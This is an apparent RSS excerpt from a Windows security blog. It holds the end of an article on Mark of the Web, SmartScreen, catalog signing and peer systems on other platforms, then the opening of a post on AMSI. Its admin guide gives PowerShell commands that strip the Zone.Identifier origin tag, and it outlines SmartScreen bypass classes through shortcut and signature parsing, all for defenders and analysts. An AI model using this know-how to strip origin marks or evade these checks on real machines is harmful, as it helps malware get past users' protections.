&lt;p&gt;Every major desktop OS now has &lt;em&gt;something&lt;/em&gt; that looks like Microsoft&apos;s catalog of trust. None of them have all three layers, and each one optimises a different point in the fail-open vs. fail-closed spectrum.&lt;/p&gt;
&lt;h3&gt;macOS Gatekeeper + com.apple.quarantine + Notarization&lt;/h3&gt;
&lt;p&gt;The direct architectural analogue: macOS Gatekeeper. The Apple Platform Security guide [@support-apple-com-sec5599b66df-web] describes Gatekeeper as a check that &lt;em&gt;&quot;verifies that the software is from an identified developer, is notarized by Apple to be free of known malicious content, and hasn&apos;t been altered.&quot;&lt;/em&gt;&lt;/p&gt;

Apple&apos;s server-side malware scan, mandatory for non-App-Store distribution on macOS Catalina (2019) and later. The developer submits each binary to Apple; Apple&apos;s automated scan produces a *ticket* the developer staples to the application bundle (or that Gatekeeper fetches online at first launch). Without a notarization ticket, the default Gatekeeper policy refuses to run the binary, with no in-product override short of right-clicking and choosing Open.
&lt;p&gt;Three pieces compose: &lt;code&gt;com.apple.quarantine&lt;/code&gt; is the extended attribute that quarantine-aware downloaders (Safari, Chrome, Mail, AirDrop) write -- structurally the peer of &lt;code&gt;Zone.Identifier&lt;/code&gt;. Gatekeeper is the launch-time consumer -- structurally the peer of the Attachment Execution Service plus SmartScreen. Notarization is the cloud-side scan -- structurally the peer of SmartScreen reputation, with one important difference: it is &lt;em&gt;mandatory&lt;/em&gt;, not optional, and it produces a stapleable ticket that lets Gatekeeper run &lt;em&gt;fail-closed by default&lt;/em&gt;. Microsoft has no equivalent notarization requirement on Windows; the only Windows mechanism that comes close is Smart App Control Enforcement, and it is opt-in by clean install rather than universal.&lt;/p&gt;
&lt;h3&gt;Chromium Safe Browsing v5&lt;/h3&gt;
&lt;p&gt;Google&apos;s Safe Browsing v5 hashList API [@developers-google-com-v5-hashlist] is the cross-platform URL/file reputation service every Chromium derivative uses (Chrome, Edge, Brave, Opera, and Firefox). The current protocol uses rice-delta-encoded SHA-256 prefix lists; the browser fetches a local list of variable-length hash &lt;em&gt;prefixes&lt;/em&gt;, checks navigated URLs against the prefix list, and only consults the server when there is a prefix match -- a privacy-preserving design that lets the server learn only that some client queried &lt;em&gt;something matching this prefix&lt;/em&gt;, not the actual URL. The v4 documentation [@developers-google-com-browsing-v4] makes the privacy posture explicit: &lt;em&gt;&quot;You exchange data with the server infrequently (only after a local hash prefix match) and using hashed URLs, so the server never knows the actual URLs queried by the clients.&quot;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;What Safe Browsing does not do is integrate with OS-level execution control. There is no equivalent of MOTW. Once a file is on disk, the OS has no Safe-Browsing-supplied origin tag to consume. Safe Browsing is a different point on the latency / privacy / coverage triangle: better privacy, narrower scope, no execution-time enforcement.&lt;/p&gt;
&lt;h3&gt;Linux distribution package signing&lt;/h3&gt;
&lt;p&gt;RPM (1995) [@rpm-org-abouthtml] and dpkg [@en-wikipedia-org-wiki-dpkg] / APT (1994-1998) [@en-wikipedia-org-wiki-aptsoftware]) shipped signed package repositories before Windows had Authenticode. The signing primitive is OpenPGP detached signatures on per-repository manifests, with per-package SHA-256 hashes in the manifest and out-of-band distribution of the repository public keys. Reproducible builds [@reproducible-builds-org-who-projects] (Debian, NixOS, Tor Browser, and other participating distributions) extend the trust property: a third party can rebuild and verify that the published binary matches the source.&lt;/p&gt;
&lt;p&gt;Linux gives you strong publisher attestation for &lt;em&gt;packaged&lt;/em&gt; software. It gives you nothing for files fetched with &lt;code&gt;curl&lt;/code&gt;, downloaded from a website, or sideloaded via AppImage / Flatpak / Snap. There is no per-file origin tag. There is no graduated reputation. There is no execution-time check. Linux collapses the three-signal model to one signal (publisher attestation for packaged software) and accepts the corresponding gap.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;Windows (SAC)&lt;/th&gt;
&lt;th&gt;macOS (Gatekeeper + Notarization)&lt;/th&gt;
&lt;th&gt;Chromium (Safe Browsing v5)&lt;/th&gt;
&lt;th&gt;Linux (package signing)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Origin tag&lt;/td&gt;
&lt;td&gt;MOTW (&lt;code&gt;Zone.Identifier&lt;/code&gt;)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;com.apple.quarantine&lt;/code&gt; xattr&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Reputation&lt;/td&gt;
&lt;td&gt;SmartScreen / ISG cloud&lt;/td&gt;
&lt;td&gt;Notarization ticket (binary present / absent)&lt;/td&gt;
&lt;td&gt;Safe Browsing hash prefix lookup&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Publisher attestation&lt;/td&gt;
&lt;td&gt;Authenticode + catalogs&lt;/td&gt;
&lt;td&gt;Developer ID code signature&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;OpenPGP per-repo signature&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Default policy&lt;/td&gt;
&lt;td&gt;Warn (override allowed); Block (SAC Enforcement)&lt;/td&gt;
&lt;td&gt;Block (right-click override)&lt;/td&gt;
&lt;td&gt;Warn&lt;/td&gt;
&lt;td&gt;Block packaged / allow ad-hoc&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cloud dependency&lt;/td&gt;
&lt;td&gt;Required for unknown files&lt;/td&gt;
&lt;td&gt;Required at first launch (ticket then cached)&lt;/td&gt;
&lt;td&gt;Required only on prefix match&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Scope&lt;/td&gt;
&lt;td&gt;OS-wide (every launch)&lt;/td&gt;
&lt;td&gt;OS-wide (every first launch)&lt;/td&gt;
&lt;td&gt;Browser-only&lt;/td&gt;
&lt;td&gt;Package manager only&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Microsoft&apos;s stack is uniquely &lt;em&gt;layered&lt;/em&gt;; each peer architecture collapses to one or two of the three signals. Each makes a different trade-off between coverage and friction. None of them removes the limit at the other end of the spectrum: the user.&lt;/p&gt;
&lt;h2&gt;8. Theoretical Limits: What Reputation Cannot Decide&lt;/h2&gt;
&lt;p&gt;Three things no file-trust system can do by construction. These are not bugs. They are upper bounds.&lt;/p&gt;
&lt;h3&gt;Provenance erasure is unavoidable&lt;/h3&gt;
&lt;p&gt;A user who right-clicks and creates a new text document writes a file with no MOTW by definition. A process that writes to NTFS without going through the Attachment Execution Service writes a file with no MOTW. A copy onto FAT or exFAT and back strips the ADS. The catalog of trust is &lt;em&gt;not&lt;/em&gt; a cryptographic origin proof; it is a hint that survives common-but-not-all copy paths. Closing this bound requires either tagging every file write at the file-system layer (breaking the UNIX-style scripting model and approximating what macOS notarization-required-for-launch does at a higher layer) or refusing to launch any file without a tag, which is exactly what Smart App Control&apos;s Enforcement mode does at the cost of breaking unsigned legitimate software.&lt;/p&gt;
&lt;h3&gt;Reputation is an inductive signal&lt;/h3&gt;
&lt;p&gt;A brand-new file or certificate cannot have reputation by definition. Reputation accumulates from telemetry, and any reputation system must either fail-open on unknowns (Windows: warn but allow override) or fail-closed (macOS Gatekeeper with the default policy, SAC Enforcement: refuse). There is no third option. Microsoft chose fail-open with friction, and that choice creates a permanent class of &quot;valid certificate, low reputation&quot; social-engineering bypasses. Apple chose fail-closed with notarization as the explicit unknown-to-known transition path. Both choices are defensible. Neither is wrong.&lt;/p&gt;
&lt;h3&gt;The user is the last gate&lt;/h3&gt;
&lt;p&gt;&quot;More info -&amp;gt; Run anyway&quot; is not a bug. It is a deliberate concession to usability and to the unsigned-software long tail that Windows has historically supported. Any system the user can override is upper-bounded in security by the user&apos;s willingness to override. The only way to remove the bound is to remove the override, which is exactly the iOS sealed-application model -- and what Smart App Control Enforcement approaches on consumer Windows.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Reputation is an inductive signal; the catalog of trust is a hint that survives common copy paths; and the user is the last gate. None of these are bugs. They are upper bounds. The system can only close the gap between them by removing user override, which is exactly what Smart App Control Enforcement does.&lt;/p&gt;
&lt;/blockquote&gt;

The temptation, looking at the 2022-2024 CVE arc, is to say macOS&apos;s mandatory-notarisation fail-closed model is &quot;more secure&quot; and Windows should adopt it. The argument is weaker than it looks. Fail-closed breaks first-day legitimate software, which on macOS is acceptable because the Mac platform has, throughout its modern history, treated software as something that flows through the Mac App Store or through identified developers willing to participate in notarization. Windows has, throughout *its* modern history, treated software as something that flows in arbitrary forms from arbitrary publishers: enterprise line-of-business apps from a vendor whose name is unfamiliar; one-off utilities from a developer&apos;s personal site; CI/CD builds of in-house tooling. Refusing to launch any of those by default breaks the platform&apos;s core compatibility promise. The Windows trade-off is friction over coverage; the macOS trade-off is coverage over friction. Neither is strictly better, and the right answer depends on whose long tail you are protecting.
&lt;p&gt;If those are the upper bounds, what active problems are researchers and Microsoft engineers still working to close?&lt;/p&gt;
&lt;h2&gt;9. Open Problems in 2025&lt;/h2&gt;
&lt;p&gt;Five places where the security model is still moving.&lt;/p&gt;
&lt;h3&gt;MOTW on non-NTFS file systems&lt;/h3&gt;
&lt;p&gt;ReFS, FAT, exFAT, and most network file systems either do not implement NTFS alternate data streams or implement them inconsistently. There is no documented Microsoft transport for &quot;Zone.Identifier on non-NTFS.&quot; The community-maintained archiver matrix [@github-com-support-comparison] documents the problem from the archiver side. USB sticks and SD cards (FAT32 / exFAT by default) are the dominant copy paths in real malware delivery, and they are exactly the file systems that drop MOTW silently. Workarounds in the wild include zipping marked files inside a container that itself has MOTW, but propagation across the extraction step is exactly the class CVE-2022-41049 (the ZIP sibling of CVE-2022-41091, documented in 0patch&apos;s ZIP write-up [@blog-0patch-com-mark-ofhtml]) addressed -- and is therefore exactly where the next propagator bug will live.&lt;/p&gt;
&lt;h3&gt;Smart App Control silently disabling itself&lt;/h3&gt;
&lt;p&gt;Microsoft Learn&apos;s SAC overview [@learn-microsoft-com-control-overview] records the behaviour bluntly: &lt;em&gt;&quot;If we detect that you&apos;re one of those users, we automatically turn Smart App Control off so you can work with fewer interruptions.&quot;&lt;/em&gt; SAC ships in Evaluation mode by default on supported clean installs and may auto-disable rather than auto-promoting to Enforcement based on telemetry. Microsoft documents the existence of the threshold but not the threshold itself. The de-facto enforced base is unknown; Elastic&apos;s &lt;em&gt;Dismantling Smart App Control&lt;/em&gt; [@elastic-co-app-control] flagged the consequence: claims about SAC effectiveness in production are hard to evaluate absolutely.&lt;/p&gt;
&lt;h3&gt;The shortcut surface remains a moving target&lt;/h3&gt;
&lt;p&gt;Three of the last four years of SmartScreen-class CVEs (CVE-2023-36025, CVE-2024-21412, CVE-2024-38217) pivoted through shortcut canonicalisation or chained-shortcut MOTW propagation. Microsoft patches each variant individually rather than enforcing a clean rule like &quot;any shortcut whose target is not on the same volume must propagate MOTW from the shortcut to the resolved target.&quot; The shortcut surface is decidable (you could write the propagation rule above) but it is not minimal: Microsoft has chosen, so far, to patch the surface bug-by-bug rather than to deploy the rule.&lt;/p&gt;
&lt;h3&gt;SmartScreen on non-Edge browsers&lt;/h3&gt;
&lt;p&gt;The retirement of the Windows Defender Browser Protection Chrome extension during 2022 left a coverage gap that no shipping Microsoft product fills. Smart App Control plus the OS-level Attachment Execution Service can partially compensate -- a file downloaded by Chrome that ends up in Internet Zone gets the OS-level launch check -- but the URL-time warning, the kind that catches the user before the file is on disk, is not available on non-Edge browsers in 2025.&lt;/p&gt;
&lt;h3&gt;ML-augmented reputation failure modes&lt;/h3&gt;
&lt;p&gt;Microsoft has stated that SmartScreen and ISG use machine-learning analytics in addition to telemetry. The standard ML-system failure modes -- adversarial examples, classifier drift, training-data poisoning -- have not been studied openly for SmartScreen on a common corpus. Drift is bounded by the documented 24-hour cloud refresh cadence in the ISG documentation [@learn-microsoft-com-security-graph], but the worst-case dependence on the ML decision function is opaque.&lt;/p&gt;
&lt;p&gt;There is also the &lt;strong&gt;cross-platform benchmark gap&lt;/strong&gt;: no public, peer-reviewed empirical comparison of SmartScreen, Gatekeeper-with-Notarization, and Safe Browsing detection on a common malware corpus exists. AV-Test and AV-Comparatives publish anti-malware engine benchmarks but explicitly exclude reputation-only systems. Elastic&apos;s writeup addresses Windows internally but not cross-platform. Practitioners choosing an OS or browser security architecture have no apples-to-apples data.&lt;/p&gt;
&lt;p&gt;Those are the open problems. The closed problem -- how to use the catalog of trust correctly today -- has a fairly small set of recipes for each audience.&lt;/p&gt;
&lt;h2&gt;10. Practical Guide&lt;/h2&gt;
&lt;p&gt;Four audiences, one short subsection each. Concrete commands, supported APIs, and the things newcomers always get wrong.&lt;/p&gt;
&lt;h3&gt;For an admin or IT pro&lt;/h3&gt;
&lt;p&gt;Read MOTW on a file:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;# Returns the [ZoneTransfer] INI block if the ADS exists; otherwise errors
Get-Content -Path &apos;C:\Users\u\Downloads\payload.exe&apos; -Stream Zone.Identifier
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Write it (rare, but useful for testing):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;$content = @&quot;
[ZoneTransfer]
ZoneId=3
HostUrl=&amp;lt;source URL&amp;gt;
&quot;@
Add-Content -Path &apos;.\test.exe&apos; -Stream Zone.Identifier -Value $content
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Strip it (convenience, not a security boundary -- see Section 11):&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-powershell&quot;&gt;# Either of these works:
Unblock-File -Path &apos;.\test.exe&apos;
Remove-Item -Path &apos;.\test.exe&apos; -Stream Zone.Identifier
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Enumerate the system catalog directories under &lt;code&gt;%SystemRoot%\System32\CatRoot&lt;/code&gt; and verify a binary against them with &lt;code&gt;signtool&lt;/code&gt;:&lt;/p&gt;
&lt;pre&gt;&lt;code class=&quot;language-cmd&quot;&gt;signtool verify /a /v /pa /kp cmd.exe
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;signtool verify /a&lt;/code&gt; walks the system catalog roots when the file has no embedded signature; &lt;code&gt;/pa&lt;/code&gt; selects the &lt;em&gt;default authentication verification policy&lt;/em&gt; (the same policy &lt;code&gt;WinVerifyTrust&lt;/code&gt; uses), and &lt;code&gt;/kp&lt;/code&gt; enables kernel-mode driver-policy verification, which is what tells you whether the catalog covers the file under WHQL-style rules.&lt;/p&gt;
&lt;p&gt;Enabling Smart App Control on consumer Windows 11 is a &lt;em&gt;clean install&lt;/em&gt; operation -- the Microsoft Learn overview is explicit that SAC cannot be enabled on a system that has already been used. Deploying WDAC + ISG in an enterprise is documented at the Microsoft Learn ISG WDAC page [@learn-microsoft-com-security-graph] and is the practical enterprise SOTA on devices SAC cannot reach.&lt;/p&gt;
&lt;h3&gt;For a malware analyst or incident responder&lt;/h3&gt;
&lt;p&gt;What to look for in &lt;code&gt;Zone.Identifier&lt;/code&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The &lt;code&gt;HostUrl&lt;/code&gt; field is a frequent pivot to the attacker&apos;s delivery infrastructure. A &lt;code&gt;HostUrl&lt;/code&gt; pointing at a known phishing kit&apos;s domain is a hard tell.&lt;/li&gt;
&lt;li&gt;Mismatched &lt;code&gt;ZoneId&lt;/code&gt; and &lt;code&gt;LastWriterPackageFamilyName&lt;/code&gt; (for example, &lt;code&gt;ZoneId=0&lt;/code&gt; with &lt;code&gt;LastWriterPackageFamilyName=Microsoft.MicrosoftEdge&lt;/code&gt;) is suspicious; legitimate writers do not produce that combination.&lt;/li&gt;
&lt;li&gt;An absent &lt;code&gt;Zone.Identifier&lt;/code&gt; on a file demonstrably delivered through a browser, mail client, or archive is the signature of a propagator gap or a deliberate strip.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;How to spot a known SmartScreen-bypass attempt:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Malformed Authenticode signatures in JS or MSI payloads (the CVE-2022-44698 / CVE-2023-24880 class). Tools like &lt;code&gt;signtool verify /v&lt;/code&gt; will report the parse failure.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;.url&lt;/code&gt; files with &lt;code&gt;URL=&lt;/code&gt; pointing at a remote &lt;code&gt;.cpl&lt;/code&gt;, &lt;code&gt;.bat&lt;/code&gt;, or other launch-capable target (the CVE-2023-36025 class).&lt;/li&gt;
&lt;li&gt;&lt;code&gt;.lnk&lt;/code&gt; files whose &lt;code&gt;LinkTarget&lt;/code&gt; has an unusual extended-path encoding -- trailing dots or spaces, whole-path-in-a-single-segment, or relative-only forms (the CVE-2024-38217 class). AhnLab&apos;s writeup [@asec-ahnlab-com-en-90299] gives concrete byte-level examples.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;For a developer shipping a signed app&lt;/h3&gt;
&lt;p&gt;Your installer will trigger &quot;Unknown publisher&quot; on day one even with a valid Authenticode signature, because reputation has to accumulate from real-world telemetry and -- since approximately 2020 -- EV certificates no longer fast-path that accumulation. The Microsoft Learn reputation page [@learn-microsoft-com-smartscreen-reputation] is the canonical reference for the developer-side reputation model. Microsoft Artifact Signing (formerly Trusted Signing, formerly Azure Code Signing, currently around $10/month with no hardware token and CI/CD integration) is the cheapest documented modern path to a publishable Authenticode signature.Microsoft Artifact Signing (formerly Trusted Signing, formerly Azure Code Signing) at roughly $10/month is the cheapest documented path to a publishable Authenticode signature with no hardware token requirement. For small publishers, it is the modern alternative to a self-hosted HSM workflow. The corresponding SmartScreen reputation still has to accumulate from telemetry, however -- buying a signing service does not buy reputation.&lt;/p&gt;
&lt;p&gt;If you ship your own downloader (rare, but consumer apps sometimes do), call &lt;code&gt;IAttachmentExecute::Save&lt;/code&gt; [@learn-microsoft-com-shobjidlcore-iattachmentexecute] for the file you just downloaded. That triggers the registered AV scanner and AMSI hooks. Writing the &lt;code&gt;Zone.Identifier&lt;/code&gt; ADS directly via &lt;code&gt;WriteFile&lt;/code&gt; skips them.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; If you write MOTW from your own downloader or EDR product, call &lt;code&gt;IAttachmentExecute::Save&lt;/code&gt; rather than writing the &lt;code&gt;Zone.Identifier&lt;/code&gt; ADS directly via &lt;code&gt;WriteFile&lt;/code&gt;. The Shell COM path triggers the Attachment Manager hooks -- AMSI, the registered AV scanner -- that downstream defenders rely on. The direct-write path silently bypasses them, which is sometimes useful for testing but never the right production choice.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;For an EDR or sandbox vendor&lt;/h3&gt;
&lt;p&gt;The MOTW &lt;em&gt;propagation contract&lt;/em&gt; you must honour: every code path that copies, extracts, mounts, or saves a marked file must re-write the &lt;code&gt;Zone.Identifier&lt;/code&gt; stream onto the destination. The 2022-2024 CVE arc is a public record of where Microsoft itself missed propagators -- ISO mounts, Outlook attachment saves, &lt;code&gt;.url&lt;/code&gt; handling, &lt;code&gt;.lnk&lt;/code&gt; canonicalisation. Any EDR with file-write hooks that re-materialises files (sandbox extraction, quarantine release, transparent decryption of EFS) must propagate MOTW or it creates the same class of bypass on its own surface.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;$KERNEL.SMARTLOCKER.ORIGINCLAIM&lt;/code&gt; NTFS extended attribute is the WDAC-side cache of a positive ISG verdict; respect it in your filter driver if you implement code-integrity overlays. Use &lt;code&gt;IZoneIdentifier&lt;/code&gt; / &lt;code&gt;IZoneIdentifier2&lt;/code&gt; for reads (low-level, no AV hook) and &lt;code&gt;IAttachmentExecute::Save&lt;/code&gt; for writes (Shell-level, triggers the documented hooks). And remember: writing the ADS via &lt;code&gt;WriteFile&lt;/code&gt; is not equivalent to going through Shell COM. The Shell path is what downstream defenders are listening on.&lt;/p&gt;

1. **Writing the ADS via `WriteFile` instead of `IAttachmentExecute`.** Skips the registered AV / AMSI scan.
2. **Trusting `Unblock-File` as a security boundary.** It is a convenience cmdlet; any user-mode process can do the same thing.
3. **Conflating SmartScreen with Microsoft Defender Antivirus.** Different engines, different ETW providers, different cloud backends.
4. **Assuming EV certs grant instant SmartScreen reputation.** They do not, as of approximately 2020 (Microsoft Learn [@learn-microsoft-com-smartscreen-reputation]).
5. **Assuming a Microsoft Defender SmartScreen browser extension exists for Chrome or Firefox.** The Windows Defender Browser Protection extension was discontinued during 2022; no replacement exists.
6. **Calling `WinVerifyTrust` on a file with no embedded signature and stopping at `TRUST_E_NOSIGNATURE`.** The catalog fall-through is the canonical path; hash with `CryptCATAdminCalcHashFromFileHandle`, enumerate with `CryptCATAdminEnumCatalogFromHash`, then re-verify the catalog.
7. **Trusting SAC&apos;s &quot;On&quot; state to mean Enforcement.** Settings distinguishes On (Enforcement) from Evaluation; Enforcement is a much smaller deployment population.
&lt;h2&gt;11. Frequently Asked Questions&lt;/h2&gt;

No, not since approximately 2020. The Microsoft Learn reputation-for-developers page [@learn-microsoft-com-smartscreen-reputation] states it explicitly: *&quot;EV certificates no longer bypass SmartScreen. Years ago, signing files with an Extended Validation (EV) code signing certificate would result in positive SmartScreen reputation by default, but this behavior no longer exists.&quot;* Reputation accumulates from telemetry regardless of certificate class. Buying an EV certificate today buys you the publisher identity assertion; it does not buy you a SmartScreen fast path.

Only if the USB stick is NTFS. FAT, FAT32, and exFAT (the default for most USB sticks and SD cards out of the box) cannot store NTFS alternate data streams; the `Zone.Identifier` ADS is silently lost on copy. Network file systems behave inconsistently; some preserve streams, most do not. This is one of the documented open problems in Section 9.

No. `Unblock-File` is a convenience cmdlet that deletes the `Zone.Identifier` stream. Any process running as the user can do the same thing (`Remove-Item -Stream Zone.Identifier` does the work directly; so does a raw `DeleteFile` on the ADS name). MOTW is a metadata hint, not an access-control mechanism.

No. They are separate engines with separate Event Tracing for Windows providers, separate cloud backends, and separate user-experience surfaces. SmartScreen is cloud reputation plus URL filtering. Microsoft Defender Antivirus is local plus cloud signatures plus behavioural detection. Correlating SmartScreen verdicts with Defender events is a Microsoft Defender for Endpoint integration problem, not a single-engine query.

No. The Microsoft-developed *Windows Defender Browser Protection* Chrome extension, the only browser-extension form of SmartScreen Microsoft ever shipped, was retired during 2022 (the former Chrome Web Store listing [@chrome-google-com-browser-bkbeeeffjjeopflfhgeknacdieedcoblj] no longer hosts the extension). No replacement exists. Third-party guides that still claim such an extension is available are out of date. The OS-level Attachment Execution Service plus Smart App Control covers some of the gap for files downloaded with non-Edge browsers, but the URL-time warning is unavailable on Chrome and Firefox in 2025.

No. The Windows operating system itself relies on catalog signatures for most in-box binaries. Open any default Windows install and inspect `cmd.exe`, `notepad.exe`, or the in-box satellite DLLs under `%SystemRoot%\System32`: most have no embedded Authenticode signature. They verify through `WinVerifyTrust`&apos;s catalog fall-through against the system catalogs (path and `cryptsvc` lineage covered in §6.3). Catalogs are also the substrate WHQL driver packaging and Windows Update rely on. They are far from obsolete; they are the off-line trust root the whole catalog-of-trust architecture rests on.
&lt;p&gt;&amp;lt;StudyGuide slug=&quot;mark-of-the-web-smartscreen-and-the-catalog-of-trust&quot; keyTerms={[
  { term: &quot;Mark of the Web (MOTW)&quot;, definition: &quot;Metadata recording the origin of a file Windows did not produce itself; lives as the NTFS Zone.Identifier alternate data stream containing an INI-style [ZoneTransfer] block.&quot; },
  { term: &quot;NTFS Alternate Data Stream (ADS)&quot;, definition: &quot;An NTFS feature that lets a file carry multiple named secondary data streams. Addressed as filename:streamname:type. Survives Windows Explorer copies on NTFS but is lost on FAT/exFAT.&quot; },
  { term: &quot;URLZONE&quot;, definition: &quot;Five-value enumeration from IE4 (1997): 0 Local Machine, 1 Intranet, 2 Trusted, 3 Internet, 4 Untrusted. Every later Windows trust signal resolves a file to one of these integers.&quot; },
  { term: &quot;Attachment Execution Service&quot;, definition: &quot;XP SP2 OS service that intercepts file launches from registered trust-aware callers and applies per-zone policy via the Shell COM IAttachmentExecute interface.&quot; },
  { term: &quot;SmartScreen Application Reputation&quot;, definition: &quot;Cloud-backed file-and-publisher reputation oracle that shipped with IE9 (2010) and integrated into the Windows Shell with Windows 8 (2012). Two-stage UX: modal block, then &apos;More info -&amp;gt; Run anyway&apos;.&quot; },
  { term: &quot;Authenticode catalog file (.cat)&quot;, definition: &quot;PKCS#7 SignedData container holding a list of file hashes plus per-member attributes. A single signature vouches for all members. Lives under %SystemRoot%\\System32\\CatRoot, managed by cryptsvc.&quot; },
  { term: &quot;Smart App Control (SAC)&quot;, definition: &quot;Windows 11 22H2+ execution-control feature. Structurally a WDAC AllowAll policy minus an ISG-driven blocklist. Clean-install-only; runs in Off, Evaluation, or Enforcement mode.&quot; },
  { term: &quot;Intelligent Security Graph (ISG)&quot;, definition: &quot;Microsoft&apos;s cloud-side reputation backend. Consumed by SmartScreen, by WDAC via policy rule option 14, and by Smart App Control. 24-hour cloud refresh cadence. Positive verdicts cached as the $KERNEL.SMARTLOCKER.ORIGINCLAIM EA.&quot; },
  { term: &quot;Notarization (macOS)&quot;, definition: &quot;Apple&apos;s mandatory server-side malware scan for non-App-Store distribution on macOS Catalina (2019) and later. Produces a stapleable ticket that lets Gatekeeper run fail-closed by default.&quot; }
]} questions={[
  { q: &quot;Why was the 1999 HTML-comment form of MOTW abandoned?&quot;, a: &quot;It was in-band (any text processor could strip it), format-specific (only worked for HTML, but executables and archives were the dominant attack vector by 2002), and consumer-specific (only IE knew to look for it). The XP SP2 NTFS-ADS move solved all three.&quot; },
  { q: &quot;What is the propagation contract for MOTW?&quot;, a: &quot;Every code path that copies, extracts, mounts, or saves a marked file must re-write the Zone.Identifier stream onto the destination. Bypasses in 2022-2024 (ISO mount, ZIP extraction, shortcut chains, LNK canonicalisation) are propagator failures.&quot; },
  { q: &quot;How does WinVerifyTrust handle a file with no embedded Authenticode signature?&quot;, a: &quot;It falls through to a catalog lookup: hash the file with CryptCATAdminCalcHashFromFileHandle, enumerate catalogs with CryptCATAdminEnumCatalogFromHash, and if a match is found, re-verify the catalog&apos;s PKCS#7 signature. This is how in-box Windows binaries like cmd.exe verify as Microsoft-signed.&quot; },
  { q: &quot;What is the structural difference between CVE-2022-44698 and CVE-2023-36025?&quot;, a: &quot;CVE-2022-44698 was a parser fail-open in the SmartScreen lookup (malformed Authenticode crashed the parser; the caller treated the error as no-warning-needed). CVE-2023-36025 was a different class: the .url handler chose not to invoke SmartScreen at all for certain target types, even though MOTW was present.&quot; },
  { q: &quot;Why does Smart App Control silently disable itself on some devices?&quot;, a: &quot;If telemetry indicates the user runs many unrecognized apps in Evaluation mode, SAC switches off rather than auto-promoting to Enforcement, on the rationale that an Enforcement gate would create more friction than the user would tolerate. Microsoft documents the behaviour but not the threshold.&quot; }
]} /&amp;gt;&lt;/p&gt;
&lt;p&gt;The catalog of trust is not finished. As long as Windows ships propagators -- and any general-purpose OS will -- there will be propagator bugs, and the bypass class will continue to be data-flow-ordering, parser fail-open, and canonicalisation. The interesting question is not whether a new bypass will land. It will. The interesting question is whether Microsoft can move from per-CVE patching to enforcing the three-layer contract structurally, so the bypass class shrinks rather than rotates. Smart App Control Enforcement is one bet on how to do that. The propagation hardening of 2022-2024 is another. The next decade of Windows file trust is whether either of them finishes the work the 2004 Attachment Execution Service started: deciding, with confidence, whether it is safe to run this file.&lt;/p&gt;
</content:encoded><category>windows-security</category><category>smartscreen</category><category>mark-of-the-web</category><category>authenticode</category><category>smart-app-control</category><category>wdac</category><category>security-feature-bypass</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>AMSI: The Pre-Execution Window Where Defender Catches a Base64 Payload It Has Never Seen Before</title><link>https://paragmali.com/blog/amsi-the-pre-execution-window-defender/</link><guid isPermaLink="true">https://paragmali.com/blog/amsi-the-pre-execution-window-defender/</guid><description>How the Antimalware Scan Interface scans script content after deobfuscation but before execution, the seven runtimes it plugs into, and the nearly seven-year bypass arms race that followed.</description><pubDate>Tue, 12 May 2026 00:00:00 GMT</pubDate><content:encoded>
AMSI is a seven-function Win32 API plus a COM provider model that lets any script engine hand its post-deobfuscation buffer to a registered antimalware provider, synchronously, before the engine executes the buffer. Microsoft Defender&apos;s `MpOav.dll` is the default provider. It is the single most consequential malware-defense primitive Microsoft shipped between Authenticode and Smart App Control, and it is not, by Microsoft&apos;s own published position, a security boundary. This article walks the architecture, the seven-runtime call-site catalogue (PowerShell, WSH, Office VBA, Excel XLM, .NET 4.8, WMI, Windows 11 in-memory), the six bypass eras since 2016, and the open problems on the 2026 frontier.
&lt;h2&gt;1. A 200-Millisecond Story&lt;/h2&gt;
&lt;p&gt;A user opens a Word document attached to a phishing email. The macro decodes a base64 blob, XORs the result against a four-byte key cached in a worksheet cell, and pastes the cleartext into a string variable. The variable holds a single PowerShell command: an &lt;code&gt;Invoke-Expression&lt;/code&gt; of a 12-layer obfuscated stager whose final payload is &lt;code&gt;Invoke-Mimikatz&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Two hundred milliseconds later, &lt;a href=&quot;https://paragmali.com/blog/the-defenders-dilemma-microsoft-antivirus/&quot; rel=&quot;noopener&quot;&gt;Microsoft Defender&lt;/a&gt; flags the deobfuscated string &lt;code&gt;Invoke-Mimikatz&lt;/code&gt; and refuses to run it. Not the base64. Not the XOR. Not the macro. The actual deobfuscated PowerShell, in the form the PowerShell tokenizer was about to execute.&lt;/p&gt;
